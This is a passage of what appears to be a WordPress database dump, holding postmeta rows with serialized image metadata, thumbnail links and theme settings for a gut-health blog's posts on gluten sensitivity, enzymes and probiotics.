9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:224598;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"Gluten-Senstivity-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10344;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"Gluten-Senstivity-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130969;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:31:\"Gluten-Senstivity-1536x1022.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1022;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:471705;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:31:\"Gluten-Senstivity-2048x1363.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1363;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:788815;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:29:\"Gluten-Senstivity-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114662;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:30:\"Gluten-Senstivity-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:196961;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:30:\"Gluten-Senstivity-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:210192;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:31:\"Gluten-Senstivity-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:414645;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:21:\"Gluten-Senstivity.jpg\";}'),(14867,5582,'_wp_attachment_image_alt','How to deal with gluten sensitivity'),(14868,5581,'_thumbnail_id','5582'),(14869,5581,'_edit_last','1'),(14870,5581,'qodef_page_content_behind_header_meta','no'),(14871,5581,'qodef_boxed_background_image_attachment_meta','fixed'),(14872,5581,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14873,5581,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14874,5581,'qodef_video_type_meta','social_networks'),(14875,5581,'qodef_audio_type_meta','social_networks'),(14876,5581,'qodef_post_skin','qodef-post-light-skin'),(14877,5581,'qodef_disable_vertical_header_background_image_meta','no'),(14878,5581,'qodef_disable_header_widget_logo_area_meta','no'),(14879,5581,'qodef_disable_header_widget_menu_area_meta','no'),(14884,5586,'_edit_lock','1696947161:3'),(14885,5587,'_wp_attached_file','2023/09/erik-dungan-MQyCrJVFG8U-unsplash-scaled.jpg'),(14886,5587,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:51:\"2023/09/erik-dungan-MQyCrJVFG8U-unsplash-scaled.jpg\";s:8:\"filesize\";i:757310;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"erik-dungan-MQyCrJVFG8U-unsplash-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17168;}s:5:\"large\";a:5:{s:4:\"file\";s:45:\"erik-dungan-MQyCrJVFG8U-unsplash-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:143494;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"erik-dungan-MQyCrJVFG8U-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8759;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:44:\"erik-dungan-MQyCrJVFG8U-unsplash-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85358;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:46:\"erik-dungan-MQyCrJVFG8U-unsplash-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:298687;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:46:\"erik-dungan-MQyCrJVFG8U-unsplash-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:505518;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:44:\"erik-dungan-MQyCrJVFG8U-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75521;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:45:\"erik-dungan-MQyCrJVFG8U-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135516;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:45:\"erik-dungan-MQyCrJVFG8U-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145968;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:46:\"erik-dungan-MQyCrJVFG8U-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:256357;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:36:\"erik-dungan-MQyCrJVFG8U-unsplash.jpg\";}'),(14902,5589,'_wp_attached_file','2023/09/amber-faust-bddhFgk7u2E-unsplash-scaled.jpg'),(14889,5586,'_thumbnail_id','5589'),(14890,5586,'_edit_last','3'),(14891,5586,'qodef_page_content_behind_header_meta','no'),(14892,5586,'qodef_boxed_background_image_attachment_meta','fixed'),(14893,5586,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/amber-faust-bddhFgk7u2E-unsplash-scaled.jpg'),(14894,5586,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14895,5586,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14896,5586,'qodef_video_type_meta','social_networks'),(14897,5586,'qodef_audio_type_meta','social_networks'),(14898,5586,'qodef_post_skin','qodef-post-light-skin'),(14899,5586,'qodef_disable_vertical_header_background_image_meta','no'),(14900,5586,'qodef_disable_header_widget_logo_area_meta','no'),(14901,5586,'qodef_disable_header_widget_menu_area_meta','no'),(14903,5589,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:51:\"2023/09/amber-faust-bddhFgk7u2E-unsplash-scaled.jpg\";s:8:\"filesize\";i:194268;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"amber-faust-bddhFgk7u2E-unsplash-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8561;}s:5:\"large\";a:5:{s:4:\"file\";s:45:\"amber-faust-bddhFgk7u2E-unsplash-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47036;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"amber-faust-bddhFgk7u2E-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4507;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:44:\"amber-faust-bddhFgk7u2E-unsplash-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31144;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:46:\"amber-faust-bddhFgk7u2E-unsplash-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85172;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:46:\"amber-faust-bddhFgk7u2E-unsplash-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133800;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:44:\"amber-faust-bddhFgk7u2E-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25622;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:45:\"amber-faust-bddhFgk7u2E-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42176;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:45:\"amber-faust-bddhFgk7u2E-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38254;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:46:\"amber-faust-bddhFgk7u2E-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69282;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:36:\"amber-faust-bddhFgk7u2E-unsplash.jpg\";}'),(14909,5591,'_edit_last','1'),(14908,5591,'_edit_lock','1694847606:1'),(14910,5591,'qodef_page_content_behind_header_meta','no'),(14911,5591,'qodef_boxed_background_image_attachment_meta','fixed'),(14912,5591,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14913,5591,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14914,5591,'qodef_video_type_meta','social_networks'),(14915,5591,'qodef_audio_type_meta','social_networks'),(14916,5591,'qodef_post_skin','qodef-post-light-skin'),(14917,5591,'qodef_disable_vertical_header_background_image_meta','no'),(14918,5591,'qodef_disable_header_widget_logo_area_meta','no'),(14919,5591,'qodef_disable_header_widget_menu_area_meta','no'),(14920,5593,'_wp_attached_file','2023/09/josh-millgate-Ddenqo3Fx9Y-unsplash-scaled.jpg'),(14921,5593,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1695;s:4:\"file\";s:53:\"2023/09/josh-millgate-Ddenqo3Fx9Y-unsplash-scaled.jpg\";s:8:\"filesize\";i:889693;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"josh-millgate-Ddenqo3Fx9Y-unsplash-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18121;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"josh-millgate-Ddenqo3Fx9Y-unsplash-1024x678.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:678;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:167806;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"josh-millgate-Ddenqo3Fx9Y-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8612;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"josh-millgate-Ddenqo3Fx9Y-unsplash-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99098;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:48:\"josh-millgate-Ddenqo3Fx9Y-unsplash-1536x1017.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1017;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:348768;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:48:\"josh-millgate-Ddenqo3Fx9Y-unsplash-2048x1356.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1356;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:587534;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:46:\"josh-millgate-Ddenqo3Fx9Y-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82046;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:47:\"josh-millgate-Ddenqo3Fx9Y-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146992;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:47:\"josh-millgate-Ddenqo3Fx9Y-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141353;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:48:\"josh-millgate-Ddenqo3Fx9Y-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:278748;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:38:\"josh-millgate-Ddenqo3Fx9Y-unsplash.jpg\";}'),(14922,5594,'_wp_attached_file','2023/09/anna-pelzer-IGfIGP5ONV0-unsplash-scaled.jpg'),(14923,5594,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:51:\"2023/09/anna-pelzer-IGfIGP5ONV0-unsplash-scaled.jpg\";s:8:\"filesize\";i:691682;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"anna-pelzer-IGfIGP5ONV0-unsplash-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19352;}s:5:\"large\";a:5:{s:4:\"file\";s:45:\"anna-pelzer-IGfIGP5ONV0-unsplash-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:150447;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"anna-pelzer-IGfIGP5ONV0-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9501;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:44:\"anna-pelzer-IGfIGP5ONV0-unsplash-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93951;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:46:\"anna-pelzer-IGfIGP5ONV0-unsplash-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:287543;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:46:\"anna-pelzer-IGfIGP5ONV0-unsplash-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:465677;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:44:\"anna-pelzer-IGfIGP5ONV0-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78888;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:45:\"anna-pelzer-IGfIGP5ONV0-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133940;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:45:\"anna-pelzer-IGfIGP5ONV0-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129679;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:46:\"anna-pelzer-IGfIGP5ONV0-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:238716;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:36:\"anna-pelzer-IGfIGP5ONV0-unsplash.jpg\";}'),(14924,5591,'_thumbnail_id','5594'),(14925,5596,'_edit_lock','1694935858:1'),(14926,5561,'_wp_attachment_image_alt','Food and Supplements'),(14927,5596,'_thumbnail_id','5561'),(14928,5596,'_edit_last','1'),(14929,5596,'qodef_page_content_behind_header_meta','no'),(14930,5596,'qodef_boxed_background_image_attachment_meta','fixed'),(14931,5596,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14932,5596,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14933,5596,'qodef_video_type_meta','social_networks'),(14934,5596,'qodef_audio_type_meta','social_networks'),(14935,5596,'qodef_post_skin','qodef-post-light-skin'),(14936,5596,'qodef_disable_vertical_header_background_image_meta','no'),(14937,5596,'qodef_disable_header_widget_logo_area_meta','no'),(14938,5596,'qodef_disable_header_widget_menu_area_meta','no'),(14939,5598,'_edit_lock','1696941533:1'),(14940,5599,'_wp_attached_file','2023/09/Enzymes.jpg'),(14941,5599,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:924;s:4:\"file\";s:19:\"2023/09/Enzymes.jpg\";s:8:\"filesize\";i:77828;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"Enzymes-300x217.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4983;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"Enzymes-1024x739.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:739;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27121;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"Enzymes-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2975;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"Enzymes-768x554.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:554;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17523;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:19:\"Enzymes-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14732;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:20:\"Enzymes-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22169;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:19:\"Enzymes-550x924.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:924;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23920;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:20:\"Enzymes-1100x924.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:924;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36826;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14942,5599,'_wp_attachment_image_alt','Benefits of Enzymes'),(14943,5598,'_thumbnail_id','5599'),(14944,5598,'_edit_last','1'),(14945,5598,'qodef_page_content_behind_header_meta','no'),(14946,5598,'qodef_boxed_background_image_attachment_meta','fixed'),(14947,5598,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14948,5598,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14949,5598,'qodef_video_type_meta','social_networks'),(14950,5598,'qodef_audio_type_meta','social_networks'),(14951,5598,'qodef_post_skin','qodef-post-light-skin'),(14952,5598,'qodef_disable_vertical_header_background_image_meta','no'),(14953,5598,'qodef_disable_header_widget_logo_area_meta','no'),(14954,5598,'qodef_disable_header_widget_menu_area_meta','no'),(14955,5601,'_edit_lock','1697101205:1'),(14956,5602,'_wp_attached_file','2023/09/PRobiotics-scaled.jpg'),(14957,5602,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1610;s:4:\"file\";s:29:\"2023/09/PRobiotics-scaled.jpg\";s:8:\"filesize\";i:323732;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"PRobiotics-300x189.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6833;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"PRobiotics-1024x644.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49283;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"PRobiotics-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4257;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"PRobiotics-768x483.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:483;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29563;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:23:\"PRobiotics-1536x966.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:966;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108722;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:24:\"PRobiotics-2048x1288.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1288;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:199226;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:22:\"PRobiotics-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28404;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:23:\"PRobiotics-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46436;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:23:\"PRobiotics-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61717;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:24:\"PRobiotics-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105155;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:14:\"PRobiotics.jpg\";}'),(14958,5602,'_wp_attachment_image_alt','Probiotics and gut health'),(14959,5601,'_thumbnail_id','5602'),(14960,5601,'_edit_last','1'),(14961,5601,'qodef_page_content_behind_header_meta','no'),(14962,5601,'qodef_boxed_background_image_attachment_meta','fixed'),(14963,5601,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14964,5601,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14965,5601,'qodef_video_type_meta','social_networks'),(14966,5601,'qodef_audio_type_meta','social_networks'),(14967,5601,'qodef_post_skin','qodef-post-light-skin'),(14968,5601,'qodef_disable_vertical_header_background_image_meta','no'),(14969,5601,'qodef_disable_header_widget_logo_area_meta','no'),(14970,5601,'qodef_disable_header_widget_menu_area_meta','no'),(14971,5604,'_menu_item_type','post_type'),(14972,5604,'_menu_item_menu_item_parent','0'),(14973,5604,'_menu_item_object_id','5586'),(14974,5604,'_menu_item_object','post'),(14975,5604,'_menu_item_target',''),(14976,5604,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(14977,5604,'_menu_item_xfn',''),(14978,5604,'_menu_item_url',''),(14979,5604,'_menu_item_orphaned','1694950619'),(15004,5654,'_edit_lock','1696929940:1'),(14981,5606,'_edit_lock','1696926412:3'),(14982,5607,'_wp_attached_file','2023/09/zoltan-tasi-vHnVtLK8rCc-unsplash-scaled.jpg'),(14983,5607,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1664;s:4:\"file\";s:51:\"2023/09/zoltan-tasi-vHnVtLK8rCc-unsplash-scaled.jpg\";s:8:\"filesize\";i:142677;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"zoltan-tasi-vHnVtLK8rCc-unsplash-300x195.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6148;}s:5:\"large\";a:5:{s:4:\"file\";s:45:\"zoltan-tasi-vHnVtLK8rCc-unsplash-1024x666.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:666;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33467;}s:9:\"thumbnail\";a:5:{s:4:\"file\";